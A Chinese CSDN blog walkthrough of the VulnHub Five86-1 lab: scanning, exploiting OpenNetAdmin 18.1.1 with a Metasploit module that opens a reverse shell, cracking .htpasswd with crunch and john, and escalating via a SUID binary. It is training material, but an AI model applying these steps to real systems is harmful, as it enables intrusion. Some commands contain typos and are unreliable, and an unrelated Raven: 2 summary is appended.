vulnhub靶机Five86-1——新手进阶1

本文讲述了在KaliLinux环境下对Five86-1靶机进行渗透测试的过程,包括网络配置、端口扫描、信息收集、漏洞利用(Metasploit)、提权以及最终获取flag.txt的详细步骤。
摘要由CSDN通过智能技术生成

环境准备

攻击机:kali

靶机:Five86-1

靶机地址:https://www.vulnhub.com/entry/five86-1,417/
 

实验目的:获取flag

信息收集

打开靶机和kali虚拟机,将靶机的网络连接改为NAT模式,用nmap扫描靶机ip,得知ip为192.168.2.33

namp -sP 192.168.2.128/24

获取靶机开放端口

masscan 192.168.233 -p 0-65535 --rate 100000

扫描开放端口详细信息

nmap -T4 -sV -A -o -p 22,80,10000 192.168.2.33

打开浏览器进入80端口,http://192.168.2.33,并用Wappalyzer查看网页,没有扫描发现

查看10000端口,192.168.2.33:10000

发现提示,进入http://192.168.2.33:10000,发现登录页面

尝试输入admin,密码123456(随便试一下),没什么发现,爆破密码花费时间久,所以尝试一下其他的方法

尝试web网站目录爆破工具Dirb

看一下网页的robot.txt,可以知道网站的作者希望所有爬虫都不访问文件目录/ona的内容,所以肯定有重要的内容

进入192.168.2.33/ona

漏洞利用

这个页面的信息还是比较多的,不过我看了一下,作者英文不好,没发现什么有用的,所以打算找一下网页的漏洞,网页的名字和版本,searchsploit OpenNetAdmin 18.1.1

直接到https://www.exploit-db.com/漏洞库查找,找到对应的漏洞文件下载下来,把文件放入/usr/share/metasploit-framework/modules/exploits/unix/文件夹,进入msf,进行以下操作

exploit/47772

set rhosts 192.168.2.33

set lhost 192.168.2.128(主机ip)

exploit

成功进入目标webshell,输入命令发现无法执行,ls以下查看文件

提权

使用python切换至交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

 查看根目录,有个html文件,查看,有reports,查看,发现隐文件.htpasswd,查看文件

 发现用户和密码

提示密码10位数且只有aefhrt这些字符,用crunch创建密码字典mima.txt,桌面创建user.txt里保存douglas的用户密码

所以john爆破密码

进入douglas用户

查看根目录

经过以下步骤,进入jen用户

查看邮件内容,知道Moss的密码,进入Moss用户

 

利用suid命令,找到moss目录下的文件,进行访问

访问后发现一个root权限的二进制文件upyourgame,执行,就获取到了root权限 找到flag.txt

 

Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值